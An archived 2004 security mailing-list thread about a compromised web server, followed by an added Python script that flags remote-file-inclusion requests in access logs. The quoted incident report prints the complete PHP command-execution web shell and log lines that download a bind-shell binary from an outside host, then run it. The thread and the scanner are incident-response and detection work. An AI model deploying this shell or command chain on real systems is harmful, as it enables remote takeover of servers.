OSEC

Re: Hack attempt

From: security (securitykalamiteit.nl)
Date: Fri Jul 23 2004 - 07:40:33 CDT


Hi,
Well dear Norbert, it is not some kind of attack .. it is simply a script
kiddy that managed to get that inject.txt (actually a PHP script) on
your server, and then simply began executing commands on your server
after getting a bindshell, from the name probably on port 8080.
Now, as the dude got an eggdrop on there, he's probably some script
kiddy who uses your server for IRC stuff (can be anything), waiting for
his '31337' master to tell him to DoS someone, which is also possible.
Now there is not much to worry about if you have not had more messages from
tripwire telling you there are some binaries that have been changed; I
guess that dude is too lame to even get root, change binaries with
backdoored ones, and then change the tripwire checksums database.

Anyways .. just remove those files, try to find how he managed to get
his PHP script on there, also try to look who has a weak passwd and tell
him/her to change it!
Or even better .. just place all kinds of monitoring tools, and look if
he comes back, and try to see how bad it exactly is; in the meanwhile, I
would start building a new server that is safer, then migrate the
client stuff from the compromised machine to the new server, and then
audit the compromised machine.

cheers, Amine

Norbert Crettol wrote:

>Hi all.
>
>This is my first post here. I'm Norbert Crettol, one of the sysadmins
>of Idiap, a research center in Switzerland (www.idiap.ch).
>
>We've had an undesired visitor last night, that I discovered in the
>reports of tripwire.
>
>Here are the logs we got (we get a remote copy of the web server logs
>in another host). As of the second line, I've stripped the head and
>the tail of the line, which is always the same.
>--- begin ---
>"GET /<some script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=/sbin/ifconfig%20-a
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/;ls%20-la
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;ls%20-la
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;wget%20bosscalvin.com/bind2080
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;chmod%20755%20bind2080
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;./bind2080
>--- end ---
>I've seen no other
>
>It looks like bind8080 has created a directory /var/lock/.tmp
>and expanded an (owned by the web server owner) archive there. Here
>is the list of the files :
> 3225 jui 20 03:53 c-leet
> 15 jui 20 03:47 c-leet.dir
> 51 jui 20 03:47 cron.d
> 512 mai 12 2002 doc/
> 14 jui 21 16:27 eggdrop -> eggdrop-1.6.10*
> 2523568 mai 12 2002 eggdrop-1.6.10*
> 512 mai 12 2002 filesys/
> 343 fév 11 03:55 fuck*
> 512 mai 12 2002 help/
> 21149 nov 4 2003 kik*
> 1024 jui 21 11:00 language/
> 512 mai 12 2002 logs/
> 6 jui 20 03:48 pid.CaEm-
> 23065 jan 29 15:00 proc*
> 6 jui 20 03:48 psybnc.pid
> 28591 mai 12 2002 README
> 89 jui 20 03:53 run*
> 588 avr 1 10:00 run-*
> 708 avr 1 10:00 run--*
> 512 mar 31 08:12 scripts/
> 512 mai 12 2002 text/
> 2523568 mar 28 01:41 vi*
> 30293 nov 17 2002 xhide*
> 182 jui 20 03:47 y2kupdate*
>
>Here is the content of http://www.bosscalvin.com/inject.txt :
>--- begin ---
><font color="red">
><br><font face="Comic Sans MS" size="2"><center>
><b>CMD</b> - System Command<br><br></center></font><font face="Verdana" size="1"></center><br>
><b>#</b> CMD PHP : <br>
><b>#</b> Released by : <b>SecurityCorp</b><br>
><b>#</b> Edited by CaEm
><br>
><br>
><hr color="red" width=751px height=115px>
><br>
><pre><font face="Verdana" size="1">
><?
> // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
> if (isset($chdir)) chdir($chdir);
> ob_start();
> system("$cmd 1> /tmp/nobody 2>&1; cat /tmp/nobody; rm -rf /tmp/nobody");
> $output = ob_get_contents();
> ob_end_clean();
> if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
>?>
></font></pre>
><br>
><hr color="red" width=751px height=115px>
><br>
><font face="Comic Sans MS" size="1"><b>« CaEm » </b><br><b> </b><b> îrç.Ðå£.ñët <i>#Renjana</i></b><br>
>--- end ---
>
>Has someone seen this kind of attack? (chkrootkit doesn't detect it.)
>Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org)?
>Is there a way to stop this guy? His nickname (CaEm) appears in the
>uploaded scripts.
>
>Norbert
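The quoted log lines show the pattern worth alerting on in web server logs: a query parameter whose value is itself a remote URL (the file being included) paired with a `cmd` parameter carrying the shell command. The following Python script is an added example, not code from either poster: it parses Apache combined-format lines of that shape and returns the remote include and decoded command for each hit. The client addresses, timestamps and the `/page.php` script name in the sample are constructed; the query strings mirror the ones quoted above.

```python
import re
from urllib.parse import unquote

# Apache "combined" layout, the same shape as the first line Norbert quoted.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A parameter value that is itself a URL: the remote-include indicator.
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def split_query(target):
    """Split a request target into (path, [(name, decoded value), ...]).
    Splits on '&' only, before decoding, so 'cd%20/var/lock/;ls' stays one value."""
    path, _, query = target.partition('?')
    pairs = []
    for item in query.split('&'):
        if item:
            name, _, value = item.partition('=')
            pairs.append((unquote(name), unquote(value)))
    return path, pairs

def analyze_line(line):
    """Return a finding for a line carrying RFI or command indicators,
    None for lines that do not parse or show neither indicator."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, pairs = split_query(m.group('target'))
    remote = [(n, v) for n, v in pairs if REMOTE_URL.match(v)]
    commands = [v for n, v in pairs if n == 'cmd']
    if not remote and not commands:
        return None
    return {'host': m.group('host'), 'time': m.group('time'), 'path': path,
            'status': m.group('status'), 'remote_includes': remote,
            'commands': commands}

def scan_log(lines):
    """Run analyze_line over an iterable of log lines and keep only the hits."""
    return [f for f in (analyze_line(l) for l in lines) if f]
# Constructed sample: client addresses, timestamps and the script name are
# made up; the query strings mirror the quoted logs. The third line is benign.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Jul/2004:03:45:12 +0200] "GET /page.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '203.0.113.5 - - [20/Jul/2004:03:47:02 +0200] "GET /page.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;wget%20bosscalvin.com/bind2080 HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '198.51.100.7 - - [20/Jul/2004:03:48:30 +0200] "GET /page.php?bodyfile=header.txt HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]
if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['host']} {f['path']} include={f['remote_includes']} cmd={f['commands']}")
```

Feeding it the real access log (`scan_log(open('access_log'))`) lists every request that pulled a remote URL into a parameter, which is the quickest way to find how the script got onto the server in the first place.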